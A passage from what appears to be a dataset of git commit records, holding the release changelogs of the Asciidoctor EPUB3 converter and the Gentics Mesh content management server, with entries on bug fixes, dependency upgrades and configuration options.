to check if method is already defined\n* fix README typo, strong tag misspelled (@neontapir)\n* fix name of bundler gem; add NOKOGIRI_USE_SYSTEM_LIBRARIES to install command\n* state in README that the spine document must only have include directives as content\n\n== 1.5.0.alpha.6 (2016-01-05) - @mojavelinux\n\n* disable text-rendering: optimizeLegibility on Kindle devices (#58)\n* proxy CSS in KF8 format to work around KDP removing font-related CSS rules\n* don't append source when generating mobi file\n* disable -webkit-hyphens to prevent Kindle for Mac from crashing (#26)\n* don't explicitly enable hyphenation\n* disable hyphens in preformatted text\n* don't fail if source block is empty\n* hide style element in body from Aldiko\n* enable Original (Publisher) font option in iBooks client\n* preserve heading & monospaced fonts in Kindle Paperwhite\/Voyage\n* force left justification in listings (fix for Namo)\n* fix documentation regarding uuid attribute (@chkal)\n* add note that currently images must be placed in a directory called images (@chkal)\n* fix file type of avatar image in docs (@chkal)\n* document how to install the pre-release gem (#38)\n* use built-in font names for mobi7 (#56)\n* document the epub3-stylesdir attribute\n* prevent ellipsis from being used in inline code\n* don't include scoped icon CSS in KF8 format\n* remove link color hack for Gitden since its already covered\n* override heading and monospace fonts for non-Kindle epub3 readers\n* wrap simple dd content in span to allow font to be controlled in iBooks\n* enforce use of monospace font for preformatted elements\n* upgrade kindlegen\n* don't allow UI button to wrap\n* remove amzn-mobi from media query in CSS3-only file\n* use CSS property word-wrap instead of word-break\n* remove charset declaration from CSS\n* switch samples to modern AsciiDoc syntax\n\n{uri-repo}\/issues?q=milestone%3Av1.5.0.alpha.6[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.5.0.alpha.6[git tag]\n\n== 1.5.0.alpha.5 (2015-11-01) - @mojavelinux\n\n* implement -o flag (output file) (#31) (@chloerei)\n* implement the converter method for floating_title (#36)\n* don't print kindlegen output if -q flag is used (#34)\n* CLI now identifies as asciidoctor-epub3 (#32)\n\n{uri-repo}\/issues?q=milestone%3Av1.5.0.alpha.5[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.5.0.alpha.5[git tag]\n\n== 1.5.0.alpha.4 (2014-11-28) - @mojavelinux\n\n* set ebook-format-epub3 attribute (#16)\n* add box drawing symbols to M+ 1mn font\n* switch version to 1.5.0.x to align with core\n\n{uri-repo}\/issues?q=milestone%3Av1.5.0.alpha.4[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.5.0.alpha.4[git tag]\n\n== 1.0.0.alpha.3 (2014-08-17) - @mojavelinux\n\n* don't attempt to chdir to DATA_DIR; use full path; for compatibility with AsciidoctorJ\n* fix BOM regexp in JRuby (again)\n* switch sample png avatars to jpg\n* don't install pygments.rb on JRuby\n\n{uri-repo}\/releases\/tag\/v1.0.0.alpha.4[git tag]\n\n== 1.0.0.alpha.2 (2014-08-15) - @mojavelinux\n\n* upgrade to Asciidoctor 1.5.0\n* use new functionality of doctitle method for splitting up doctitle\n* don't put units on line-height in stylesheet\n* use regexp to match the BOM character (used to fix text justification) in JRuby\n\n{uri-repo}\/releases\/tag\/v1.0.0.alpha.2[git tag]\n\n== 1.0.0.alpha.1 (2014-07-29) - @mojavelinux\n\n* initial pre-release\n\n{uri-repo}\/issues?q=milestone%3Av1.0.0.alpha.1[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.0.0.alpha.1[git tag]\n","old_contents":"= {project-name} 
Changelog\n:project-name: Asciidoctor EPUB3\n:uri-repo: https:\/\/github.com\/asciidoctor\/asciidoctor-epub3\n\nThis document provides a high-level view of the changes to the {project-name} by release.\nFor a detailed view of what has changed, refer to the {uri-repo}\/commits\/master[commit history] on GitHub.\n\n== Unreleased\n\n* use imagedir from an image's context during packaging (#282)\n* fix images in tables not included in epub archive (#169)\n* fix `base_dir` set to wrong value in chapter documents (#190)\n* fix inline images not being included in epub archive (#30)\n\n== 1.5.0.alpha.13 (2020-02-04) - @slonopotamus\n\n* remove kindlegen and epubcheck-ruby from runtime dependencies (#288)\n\n== 1.5.0.alpha.12 (2020-02-02) - @slonopotamus\n\n* make kindlegen a runtime dependency so it installs automatically during `gem install asciidoctor-epub3` (#270)\n* make `KINDLEGEN` env var work again (#269)\n* stop adding default front cover image (#180)\n* enable Pygments on non-Windows JRuby platforms (#264)\n* provide a human-readable error message when we fail to find KindleGen (#268)\n* try to use KindleGen\/EPUBCheck binary from `$PATH` (#276)\n* add `ebook-kindlegen-path`\/`ebook-epubcheck-path` attributes to override KindleGen\/EPUBCheck executable location (#276)\n\n== 1.5.0.alpha.11 (2020-01-26) - @slonopotamus\n\n* drop unused dependencies: thread_safe, concurrent-ruby (#234)\n* add support for Unicode characters in chapter IDs (#217)\n* fix sample-book to be a valid book (#196)\n* don't insert quotation marks around quotes (#129)\n* require at least Asciidoctor 1.5.3 (#245)\n* remove Namo Reader font-icon quirk that produced invalid markup (#192)\n* fix the (in)famous `undefined method `to_ios'` when given a document that doesn't follow asciidoctor-epub3 rules (#7)\n* route messages through the logger (#176)\n* update EPUBCheck to 4.2.2.0 (#240)\n* handle invalid `revdate` gracefully (#14)\n* do not post-process EPUBCHECK env var, but use it as-is (#258)\n* disable Pygments on JRuby to prevent hanging (#253)\n* fix ENOENT error when trying to run EPUBCheck on JRuby on Windows (#256)\n* fix ENOENT error when running kindlegen on JRuby on Windows (#154)\n* set up CI for JRuby on Windows (#254)\n\n== 1.5.0.alpha.10 (2020-01-20) - @slonopotamus\n\n* fix deep xrefs between chapters when using Asciidoctor 2 (#210)\n* switch from epubcheck to epubcheck-ruby (#224)\n* set up a test suite (#11)\n* set up rubocop to enforce a consistent code style (#223)\n* use GitHub Actions for CI and release process (#218)\n* fix JS causing malformed XML that prevented footnotes from being displayed in Calibre (#207)\n* fix installing on Windows (#213, #216)\n* upgrade pygments.rb to 1.2.1 (#216)\n* gepub dependency is no longer locked to 1.0.2 and will use latest 1.0.x version\n* fix `-a ebook-validate` not working on Windows (#232)\n\n== 1.5.0.alpha.9 (2019-04-04) - @mojavelinux\n\n* allow converter to be used with Asciidoctor 2 (#185)\n* upgrade gepub (and, indirectly, nokogiri) (#177)\n* add support for start attribute on ordered list\n* don't add end mark to chapter when publication-type is book (#163)\n* drop unsupported versions of Ruby from CI matrix\n\n== 1.5.0.alpha.8 (2018-02-20) - @mojavelinux\n\n* include inline images in EPUB3 archive (#5)\n* allow chapter to begin with level-1 section title by adding support for negative leveloffset (#107)\n* don't transform the chapter title to uppercase (rely on CSS only) (#97)\n* set correct mimetype for TTF files (#120)\n* implement support for the 
custom xrefstyle for references within a chapter (#132)\n* show correct path of front cover image and the current document when missing (#124)\n* retain ID of block image (#141)\n* retain ID of example block (#143)\n* retain ID of admonition block (#146)\n* transfer role specified on block image to output (#145)\n* handle nil response from pygments.rb (#156)\n* invert the colors for the chapter title (use black on white) (#96)\n* darken font on Kindle Paperwhite devices (#67)\n\n== 1.5.0.alpha.7 (2017-04-18) - @mojavelinux\n\n* generate TOC levels in navigation document based on toclevels attribute (#90)\n* automatically resolve title of reference between documents (#87)\n* fix xref between chapter files (#27)\n* don't include byline in chapter header if the value of the publication-type attribute is book (#86)\n* don't include avatars if value of publication-type attribute is book (#53)\n* make a stronger statement in the README about the dangers of the \u201cSend to Kindle\u201d tool\n* add ebook-compress flag to enable huffdic compression in kindlegen\n* implement embedded to handle AsciiDoc table cell content (#69)\n* go into more depth about how to structure the document in README (#45)\n* explain how to adjust section level of chapters if they use level-2 headings\n* don't add content image to archive more than once (#76)\n* warn when xref cannot be resolved and text is provided (#103)\n* built-in avatar location should respect imagesdir (#2)\n* change admonition icons (#72) (@PrimaryFeather)\n* fix broken refs in bibliography (#19)\n* remove text justification hack (#92)\n* reset @page for CSS3-capable readers\n* detect Calibre, set class attribute on body to calibre-desktop, add page margins\n* force preformatted text to wrap in Gitden\n* add svg property to front matter only if reference to SVG is detected\n* switch from word-wrap to standard overflow-wrap property in stylesheet\n* loosen letter spacing in quote attribute context\n* adjust font size and margins on Gitden; force margins to be set\n* document in README that using vw units causes Aldiko to crash\n* drop trailing semi-colon in value of inline style attributes\n* use standard format (from core) for warning and error messages\n* update terminology in README; use ebook instead of e-book; refer to application as ereader\n* allow front-cover-image to be specified using block image macro (#3)\n* clean auto-generated file names for chapters (#46)\n* register chapter ID in references\n* only wrap open block content in div if id or role is defined (@rvolz)\n* link to EPUB 3.1 spec from README\n* set ebook-format-kf8 attribute when ebook-format is specified as mobi\n* document the front-cover-image attribute properly\n* update adb-push-book script to honor file extension if specified\n* document limitations of applying page-break-* property on Kindle\n* document that Asciidoctor is added as creator if creator attribute is not specified (#68)\n* group optional gems in the :optional group; remove from gemspec\n* upgrade kindlegen gem to 3.0.3\n* upgrade Pygments to 1.1.1 and allow JRuby to install it\n* document that Pygments bw style is used by default\n* honor explicit table width even when autowidth option is set\n* use method_defined? instead of respond_to? 
to check if method is already defined\n* fix README typo, strong tag misspelled (@neontapir)\n* fix name of bundler gem; add NOKOGIRI_USE_SYSTEM_LIBRARIES to install command\n* state in README that the spine document must only have include directives as content\n\n== 1.5.0.alpha.6 (2016-01-05) - @mojavelinux\n\n* disable text-rendering: optimizeLegibility on Kindle devices (#58)\n* proxy CSS in KF8 format to work around KDP removing font-related CSS rules\n* don't append source when generating mobi file\n* disable -webkit-hyphens to prevent Kindle for Mac from crashing (#26)\n* don't explicitly enable hyphenation\n* disable hyphens in preformatted text\n* don't fail if source block is empty\n* hide style element in body from Aldiko\n* enable Original (Publisher) font option in iBooks client\n* preserve heading & monospaced fonts in Kindle Paperwhite\/Voyage\n* force left justification in listings (fix for Namo)\n* fix documentation regarding uuid attribute (@chkal)\n* add note that currently images must be placed in a directory called images (@chkal)\n* fix file type of avatar image in docs (@chkal)\n* document how to install the pre-release gem (#38)\n* use built-in font names for mobi7 (#56)\n* document the epub3-stylesdir attribute\n* prevent ellipsis from being used in inline code\n* don't include scoped icon CSS in KF8 format\n* remove link color hack for Gitden since its already covered\n* override heading and monospace fonts for non-Kindle epub3 readers\n* wrap simple dd content in span to allow font to be controlled in iBooks\n* enforce use of monospace font for preformatted elements\n* upgrade kindlegen\n* don't allow UI button to wrap\n* remove amzn-mobi from media query in CSS3-only file\n* use CSS property word-wrap instead of word-break\n* remove charset declaration from CSS\n* switch samples to modern AsciiDoc syntax\n\n{uri-repo}\/issues?q=milestone%3Av1.5.0.alpha.6[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.5.0.alpha.6[git tag]\n\n== 1.5.0.alpha.5 (2015-11-01) - @mojavelinux\n\n* implement -o flag (output file) (#31) (@chloerei)\n* implement the converter method for floating_title (#36)\n* don't print kindlegen output if -q flag is used (#34)\n* CLI now identifies as asciidoctor-epub3 (#32)\n\n{uri-repo}\/issues?q=milestone%3Av1.5.0.alpha.5[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.5.0.alpha.5[git tag]\n\n== 1.5.0.alpha.4 (2014-11-28) - @mojavelinux\n\n* set ebook-format-epub3 attribute (#16)\n* add box drawing symbols to M+ 1mn font\n* switch version to 1.5.0.x to align with core\n\n{uri-repo}\/issues?q=milestone%3Av1.5.0.alpha.4[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.5.0.alpha.4[git tag]\n\n== 1.0.0.alpha.3 (2014-08-17) - @mojavelinux\n\n* don't attempt to chdir to DATA_DIR; use full path; for compatibility with AsciidoctorJ\n* fix BOM regexp in JRuby (again)\n* switch sample png avatars to jpg\n* don't install pygments.rb on JRuby\n\n{uri-repo}\/releases\/tag\/v1.0.0.alpha.4[git tag]\n\n== 1.0.0.alpha.2 (2014-08-15) - @mojavelinux\n\n* upgrade to Asciidoctor 1.5.0\n* use new functionality of doctitle method for splitting up doctitle\n* don't put units on line-height in stylesheet\n* use regexp to match the BOM character (used to fix text justification) in JRuby\n\n{uri-repo}\/releases\/tag\/v1.0.0.alpha.2[git tag]\n\n== 1.0.0.alpha.1 (2014-07-29) - @mojavelinux\n\n* initial pre-release\n\n{uri-repo}\/issues?q=milestone%3Av1.0.0.alpha.1[issues resolved] |\n{uri-repo}\/releases\/tag\/v1.0.0.alpha.1[git 
tag]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"6b2fc8ff6b41757cb22262d9993aa25545e64810","subject":"Add changelog entry for GPG keys","message":"Add changelog entry for GPG keys\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"---\ntitle: Changelog\n---\n\ninclude::content\/docs\/variables.adoc-include[]\n\n\/\/\/\/\n* Write changelog entries in present tense\n* Include GitHub issue or PR if possible using link:http:\/\/...[#123] format\n* Review your changelog entries\n* Don't include security sensitive information in the changelog\n* Include links to documentation if possible\n\/\/\/\/\n\n= Gentics Mesh Changelog\n\n[[expected]]\n== Planned Future Changes\n\n* With the release of `\/api\/v2` of the API, v1 has been deprecated. Version 2 introduced changes in the GraphQL API only. See the note in the changelog for link:#v0.35.0[v0.35.0] for details. The `\/api\/v1` still works like before; we will however cease support for `\/api\/v1` in the future. The Java REST client still uses v1 per default but can be set to v2. We advise doing so while `\/api\/v1` is still supported to prevent failures in the future.\n\n* The `html` field type will be removed in the future. Instead the `string` type will be used in combination with an additional configuration property for this field in the schema. Of course, your existing schemas will be migrated for you.\n\n* The support for the embedded Elasticsearch will be dropped in the future. It is highly recommended to link:{{< relref \"elasticsearch.asciidoc\" >}}#_dedicated_elasticsearch[set up Elasticsearch as a dedicated service].\n\n* The Mesh Server will require Java 11 with the release of 2.0.0. The runtime support for Java 8 will be dropped. The Mesh Java REST client will still be usable with Java 8.\n\n[[Unreleased]]\n\nicon:plus[] Core: The number of deployed REST API verticles can now be link:{{< relref \"administration-guide.asciidoc\" >}}#_httpsssl[configured] and its default has been changed from 5 to 2 * CPU Cores.\n\nicon:plus[] Core: It is now possible to use Gentics Mesh in read-only mode. Take a look at the link:{{< relref \"administration-guide.asciidoc\" >}}#readonly[documentation] for more information.\n\nicon:check[] REST: The `\/health\/live` and `\/health\/ready` endpoints have been added to the REST API. These endpoints are also available on the monitoring server, but adding them to the REST server makes it possible for load balancers to monitor the server on the same port that is used to proxy the requests.\n\nicon:plus[] Core: The core Vert.x library was updated to version `3.8.4`.\n\nicon:plus[] Core: The core plugin framework library was updated to version `2.1.0`.\n\nicon:plus[] Security: Build artifacts for Gentics Mesh will now be cryptographically signed using GPG.\n\n[[v1.2.1]]\n== 1.2.1 (22.11.2019)\n\nicon:check[] Core: Mesh now uses a different parser for processing `*.docx` and `*.pptx` files. Parsing these files will now require far less memory.\n\nicon:check[] GraphQL: Fixed fetching node references from users. link:https:\/\/github.com\/gentics\/mesh\/issues\/393[#393] link:https:\/\/github.com\/gentics\/mesh\/issues\/934[#934]\n\nicon:check[] Java Rest Client: Fixed a bug where some generic methods would not allow response objects of any class.\n\n\n[[v1.2.0]]\n== 1.2.0 (20.11.2019)\n\nWARNING: The internal database structure has changed significantly to avoid vertices with many edges. 
This will result in a higher write performance on bigger systems. For this change, the API of Gentics Mesh did not change at all. When starting with this version on an existing database, the structure changes will be applied automatically, which will take some time to complete.\n\nCAUTION: If you are running Gentics Mesh in cluster mode, you need to link:{{< relref \"clustering.asciidoc\" >}}#_setup[initialize the cluster again]. You must use the `-initCluster` command line argument or set the `MESH_CLUSTER_INIT` to `true` on one of the master instances of the cluster.\n\nicon:check[] Java Rest Client: Generic methods (`get`, `post`, `put`, `delete`) now allow response objects of any class.\n\nicon:check[] UI: The UI has been updated to version link:https:\/\/github.com\/gentics\/mesh-ui\/blob\/develop\/CHANGELOG.md#110---2019-11-20[1.1.0].\n\n[[v1.1.1]]\n== 1.1.1 (11.11.2019)\n\nicon:plus[] GraphQL: The GraphQL Endpoint now supports the `wait` query-parameter like the Search Endpoint does. link:https:\/\/github.com\/gentics\/mesh\/issues\/805[#805]\n\nicon:plus[] Clustering: The role of an instance has been added to the link:https:\/\/getmesh.io\/docs\/api\/#admin_cluster_status_get[cluster status response].\n\nicon:check[] Core: Some optimizations to uploading binaries have been made.\n\nicon:check[] Core: Fixed an issue that sometimes caused errors when performing write requests during a schema migration.\n\nicon:check[] UI: The UI has been updated to version link:https:\/\/github.com\/gentics\/mesh-ui\/blob\/develop\/CHANGELOG.md#102---2019-11-11[1.0.2].\n\n[[v1.1.0]]\n== 1.1.0 (29.10.2019)\n\nWARNING: The internal monitoring library has been changed from dropwizard to link:https:\/\/micrometer.io\/[micrometer]. This allows better labeling of various metrics for link:https:\/\/prometheus.io\/[Prometheus]. With this change, some metrics names from Vert.x have been changed. See link:https:\/\/vertx.io\/docs\/vertx-micrometer-metrics\/java\/#_vert_x_core_tools_metrics[here] for the new list of Vert.x metrics. By default, JVM metrics are also recorded. This can be configured in the link:{{< relref \"administration-guide.asciidoc\" >}}#_monitoring_options[monitoring options]. Also, the response structure in the `\/search\/status` endpoint has changed. Take a look at the link:https:\/\/getmesh.io\/docs\/api\/#search_status_get[API docs] for a new example.\n\nicon:plus[] Search: A new setting has been added which can be used to enable Elasticsearch 7 support. The `search.complianceMode` setting in the `mesh.yml` file can be used to control the compliance mode for Elasticsearch support. The setting can also be controlled via the `MESH_ELASTICSEARCH_COMPLIANCE_MODE` environment variable. Currently there are two modes: `ES_7` for Elasticsearch 7.x and `ES_6` for Elasticsearch 6.x.\nBy default `ES_6` will be used, thus no changes are required for existing installations.\n\nicon:plus[] Core: A new endpoint for administration has been added. The `\/admin\/debuginfo` endpoint lets you gain various information about the system. Take a look at the link:{{< relref \"administration-guide.asciidoc\" >}}#debuginfo[administration guide] for details.\n\nicon:plus[] Monitoring: New metrics for caching statistics have been added. 
Take a look at the link:{{< relref \"monitoring.asciidoc\" >}}#metrics[documentation] for the new metrics.\n\nicon:check[] OrientDB: The included OrientDB version has been updated to version 3.0.24\n\nicon:check[] Core: Some extensive logging messages will now only be logged on a finer log level. These include error messages for GraphQL queries, on closed client connections and requests sent to Elasticsearch.\n\n[[v1.0.2]]\n== 1.0.2 (11.10.2019)\n\nicon:check[] Core: The internal memory usage has been reduced.\n\n[[v1.0.1]]\n== 1.0.1 (08.10.2019)\n\nicon:check[] UI: The UI has been updated to version link:https:\/\/github.com\/gentics\/mesh-ui\/blob\/develop\/CHANGELOG.md#101---2019-10-08[1.0.1]\n\nicon:plus[] Core: Link resolving now supports branches. Take a look at the link:{{< relref \"features.asciidoc\" >}}#linkresolvingbranches[documentation] for more information. link:https:\/\/github.com\/gentics\/mesh-incubator\/issues\/38[#38]\n\n[[v1.0.0]]\n== 1.0.0 (03.10.2019)\n\nicon:bullhorn[] New UI\n\n[quote]\n____\n\nThis version of Gentics Mesh contains a new UI which is accessible via `\/mesh-ui`. The old UI is still part of this release and can be accessed via `\/mesh-ui-v1`.\n\nThe following noteworthy aspects of the UI have been updated \/ altered:\n\n* The permission management has been reworked\n* The new schema editor which features autocompletion\n* The usability of the edit view has been enhanced\n* The editor for HTML fields has been replaced\n* A new image editor has been added which now supports focal point handling\n* Language handling has been improved\n* The UI no longer depends on Elasticsearch\n____\n\nicon:bullhorn[] New defaults\n\n[quote]\n____\n\nFor new server installations (`mesh-server`) the Elasticsearch embedded server will no longer be enabled by default. The demo server (`mesh-demo`) will still start the embedded Elasticsearch server for ease of use.\nIt is still possible to enable the embedded server via the `search.startEmbedded: true` and `search.url: http:\/\/localhost:9200` settings in the `mesh.yml` file.\n____\n\n\nicon:check[] Search: Synchronizing the search index when starting after Gentics Mesh has not been stopped properly will not block the startup routine anymore. link:https:\/\/github.com\/gentics\/mesh\/issues\/862[#862]\n\nicon:check[] Core: Path resolving performance has been increased.\n\n[[v0.41.0]]\n== 0.41.0 (01.10.2019)\n\nicon:plus[] REST: The ETag generation was reworked. This means that previously generated ETags are no longer valid.\n\nicon:check[] REST: Fixed ETag generation when `fields` or `rolePerms` was used. Previously these parameters did not affect the ETag. link:https:\/\/github.com\/gentics\/mesh\/issues\/881[#881]\n\nCAUTION: Reworked OAuth2 \/ OIDC support\n\n[quote]\n____\n\nThe `security.oauth2` configuration section was removed. Instead the `security.publicKeysPath` property was added.\n\nIn order to provide support for more authentication providers it is now possible to specify the path to a file which contains the public keys in the configuration. These keys will be used to validate the access tokens.\n\nYou can read more about how to set up OAuth2 \/ OIDC in the link:{{< relref \"authentication.asciidoc\" >}}#_oauth2_oidc[OAuth2 \/ OIDC] guide.\n\nIt is now also possible for Authentication Service Plugins to provide Json Web Keys (JWK) to Gentics Mesh. Plugins can load the accepted JWKs from the authentication provider server and return them to Gentics Mesh. 
A plugin has to implement the `getPublicKeys()` method to support this.\n\nPlugins can now implement the `extractUsername()` method to return the username that should be used to handle mappings between Mesh and JWT.\n\nPlease note that installations which already use an authentication plugin can either update the plugin and provide the public keys or manually add the public key to the `public-keys.json` configuration file.\n____\n\n\n[[v0.40.3]]\n== 0.40.3 (13.09.2019)\n\nicon:plus[] Java Rest Client: Various new methods have been added to handle endpoint agnostic requests (`get(), post(), delete(), put()`). These methods can be used to handle plugin requests.\n\nicon:check[] Migration: It is now possible to apply schema \/ microschema changes that include the `name` property via the `changes` endpoint. Previously the name property was not utilized.\n\n[[v0.40.2]]\n== 0.40.2 (09.09.2019)\n\nicon:plus[] Core: It is now possible to configure the transaction retry limit using the `MESH_GRAPH_TX_RETRY_LIMIT` environment variable or the `storage.txRetryLimit` parameter.\n\nicon:check[] Core: The default value for `storage.synchronizeWrites` has been changed to `true`.\n\nicon:check[] Core: The default value for the OrientDB parameter `tx.retry.delay` has been increased to 10ms, and the constant delay will be used instead of growing linearly. It is now possible to configure the delay via the `MESH_GRAPH_TX_RETRY_DELAY` environment variable.\n\nicon:check[] Config: It is now possible to override the mapping mode with the `MESH_ELASTICSEARCH_MAPPING_MODE` environment variable. link:https:\/\/github.com\/gentics\/mesh\/issues\/878[#878]\n\n[[v0.40.1]]\n== 0.40.1 (06.09.2019)\n\nCAUTION: REST: When updating permissions on an element, unset permissions in the request will not change these permissions anymore. Previously, unset permissions were set to false.\n\nicon:check[] Core: Various handlers were blocking the event loop when run. This has been fixed now.\n\nicon:check[] Core: Fixed delayed initialization of `VersionPurgeJobImpl` vertices. Previously the type was not set up during startup and this resulted in a warning when the type was first used.\n\nicon:plus[] Java Rest Client: The `createSchema()` methods now accept a `ParameterProvider` vararg parameter.\n\nicon:check[] Core: Schema validation will no longer fail by default when Elasticsearch is not available. The previous behavior can be enforced by adding `?strictValidation=true`.\n\nicon:check[] GraphQL: Fixed a bug that prevented loading of permissions of an element.\n\nicon:plus[] GraphQL: Added the `rolePerms` field to mesh elements. This allows you to load permissions of a role, similar to the link:{{< relref \"features.asciidoc\" >}}#_querying_permissions[`?role` query parameter in REST].\n\n[[v0.40.0]]\n== 0.40.0 (27.08.2019)\n\nicon:bullhorn[] Image Manipulation: The new resizing options `smart`, `prop` and `force` have been added.\n\n[quote]\n____\n\n**force**\n\nThe `?resize=force` mode will resize the image to the specified dimensions. 
This can lead to a distorted image when the aspect ratio of the source image does not match the destination aspect ratio.\n\n**smart**\n\nWhen using `?resize=smart` the resizer will automatically crop the image to the desired dimensions instead of distorting it when providing `width` _and_ `height` parameters which would result in an aspect ratio that is different from the original image's aspect ratio.\n\nThe new default image resize mode is `smart`, which potentially crops an image when the requested aspect ratio diverges from the source image's aspect ratio. The old behaviour can now be achieved by using the `?resize=force` parameter.\n\n**prop**\n\nThe `?resize=prop` mode will resize the image proportionally so that the resulting destination format fits inside the provided dimensions (`width`, `height`). No distortion of the image will occur.\n\nFor details on image manipulation and resizing options read the link:{{< relref \"image-manipulation.asciidoc\" >}}[Image Manipulation documentation].\n\nThis change might not automatically apply when an image is already in the cache. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be manually cleared.\n\n____\n\nicon:plus[] Search: A new search option `search.mappingMode` has been added. The mapping mode setting influences how mappings for fields will be generated. By default the mode `DYNAMIC` is used. In this mode mappings are generated as before. When using the mode `STRICT` only mappings for fields which have a custom mapping via the `elasticsearch` schema parameter will be created. This is useful if you want to have finer control of what contents should be added to Elasticsearch.\n\nicon:plus[] Graph: The default value for `tx.retry.delay` has been set to 0. The tx delay will thus be disabled by default.\n\nicon:plus[] Clustering: The `storage.synchronizeWrites` option will be enabled by default when clustering is active.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.23\n\n[[v0.39.2]]\n== 0.39.2 (20.08.2019)\n\nicon:check[] A regression in `v0.38.0` caused migration errors for nodes which contained not yet populated fields. This issue has now been fixed. Failed migrations can be re-run by deleting the failed job via `DELETE \/api\/v2\/admin\/jobs\/{jobUuid}` and triggering `POST \/api\/v2\/{project}\/branches\/{branchUuid}\/migrateSchemas` to create a new migration job. link:https:\/\/github.com\/gentics\/mesh\/issues\/847[#847]\n\nicon:plus[] Graph: It is now possible to configure the OrientDB transaction delay by adding the `tx.retry.delay` parameter to the `storage.parameters` field.\n\n[[v0.39.1]]\n== 0.39.1 (14.08.2019)\n\nicon:check[] A regression in `v0.39.0` broke the `\/demo` endpoint. This has been fixed now and the demo application is accessible again.\n\n[[v0.39.0]]\n== 0.39.0 (13.08.2019)\n\nicon:plus[] Core: The core has been reworked to add future support for multitenancy in Gentics Mesh.\n\n[[v0.38.1]]\n== 0.38.1 (12.08.2019)\n\nicon:check[] Plugins: A bug in the plugin startup process has been fixed. Previously plugins were not initialized prior to registration.\n\nicon:check[] GraphQL: The `pluginApi` field will no longer be added to the schema if no GraphQL plugins have been deployed to avoid schema validation errors. 
link:https:\/\/github.com\/gentics\/mesh\/issues\/842[#842]\n\nicon:plus[] Changelog: The `ReleaseBranchRenameChange` entry has been updated to reduce required memory and increase execution performance on large databases (2m+ nodes).\n\nicon:plus[] REST: An `X-Powered-By` header was added to all HTTP responses.\n\n[[v0.38.0]]\n== 0.38.0 (09.08.2019)\n\nCAUTION: Removal of mapper script support\n\n[quote]\n____\n\nThe mapper script support has been dropped due to the deprecation of the Nashorn JavaScript engine. The functionality of mapper scripts can be replaced by usage of the new link:{{< relref \"plugin-types\/auth-service-plugin.asciidoc\" >}}[Authentication Service Plugin API].\n\nThe `auth.mapperScriptDevMode` and `auth.mapperScriptPath` configuration options are no longer needed and have been removed.\n____\n\nicon:check[] Plugins: The query type of plugins will now automatically be prefixed with the plugin apiName to ensure that no type conflicts can occur.\n\n[[v0.37.1]]\n== 0.37.1 (06.08.2019)\n\nicon:plus[] Core: The core Dagger library was updated from version `2.11` to `2.24`.\n\nicon:plus[] Logging: Additional activity information will be logged when the logger for class `io.vertx.core.eventbus.EventBus` is set to level `DEBUG`.\n\n[[v0.37.0]]\n== 0.37.0 (05.08.2019)\n\nicon:bullhorn[] New Plugin System\n\n[quote]\n____\n\nThe Plugin System has been overhauled.\n\n*REST API changes*\n\nPreviously plugins were assigned a UUID and could thus be managed using this uuid:\n\n* `DELETE \/admin\/plugins\/{uuid}`\n\nThe new plugin system will now utilize the plugin id for the REST and GraphQL APIs instead. The pluginId is unique to each plugin and a better and easier-to-grasp identifier for a plugin.\n\n*New Java API \/ Structure*\n\nThe plugin API and structure have been overhauled and existing plugins need to be migrated (link:{{< relref \"plugin-migration.asciidoc\" >}}[Migration Guide]) to the new API in order to be deployable.\n\n*GraphQL Plugin support*\n\nIt is now possible to create plugins which extend the GraphQL API. Plugins which provide link:{{< relref \"plugin-development.asciidoc\" >}}#_graphql_plugin[GraphQL extensions] will be made accessible under the `pluginApi` GraphQL field.\n\n*Dropped maven repository support*\n\nIt is no longer possible to load plugins directly via Maven Coordinates. The REST API will only accept filesystem paths to plugins.\n\n*Classloader fix*\n\nThe classloader mechanism has been altered. Plugins can now provide their own library versions. Previously a class which was also present in Gentics Mesh Server was loaded from the server class loader instead of the plugin. 
icon:check[] Core: Fixed a bug that caused an error when changing a field in a schema to a binary field.

icon:plus[] REST: A core library for JSON support (Jackson) has been updated.

icon:plus[] Core: The core Vert.x library was updated to version `3.8.0`.

[[v0.36.8]]
== 0.36.8 (02.08.2019)

icon:check[] Core: Fixed a bug that caused node contents to not be found when migrating from an old version of Gentics Mesh (0.22.x) to the current version.

[[v0.36.7]]
== 0.36.7 (23.07.2019)

icon:check[] Backup: Fixed a bug in the backup handler which prevented the backup process from switching back to the correct status after a backup failed due to filesystem errors.

icon:plus[] Java REST Client: Added `#equals` and `#hashCode` implementations to REST models.

icon:plus[] Graph: It is now possible to configure the OrientDB `RID_BAG_EMBEDDED_TO_SBTREEBONSAI_THRESHOLD` setting by adding the `ridBag.embeddedToSbtreeBonsaiThreshold` parameter to the `storage.parameters` field.

icon:plus[] REST: An error will now be returned when sending the `newPassword` field in the login request while the `forcedPasswordChange` flag has not been set.

icon:plus[] REST: The webroot responses will now contain the header `Webroot-Node-Uuid` which identifies the node of the loaded content.

icon:plus[] REST: The authentication and element loading performance has been greatly increased.

[[v0.36.6]]
== 0.36.6 (16.07.2019)

icon:plus[] REST: The performance of path resolving has been improved.

icon:plus[] Core: A new configuration section has been added. The `cache` options in the `mesh.yml` can now be used to control cache settings. The `cache.pathCacheSize` config setting and `MESH_CACHE_PATH_SIZE` environment variable can be used to control the path cache, which will improve webroot and GraphQL path resolving performance.

icon:plus[] REST: The `webroot` endpoint will now set the `Cache-Control` header to `public` if the requested node can be read using the anonymous role. Otherwise the header will be set to `private`. This information is useful if you want to use a caching proxy in between Gentics Mesh and your front-end application.

icon:check[] Core: Performance of loading nodes has been improved.

icon:check[] Core: Request logging now uses the link:https://vertx.io/docs/apidocs/io/vertx/ext/web/handler/LoggerFormat.html#SHORT[short format], which also shows how much time the response took to complete.

icon:check[] Core: Improved performance when loading images with image manipulation.

[[v0.36.5]]
== 0.36.5 (10.07.2019)

icon:plus[] Upload: The `upload.parser` config setting and `MESH_BINARY_DOCUMENT_PARSER` environment variable can be used to control whether uploads should be parsed to extract metadata and contents. Uploads will be parsed by default.

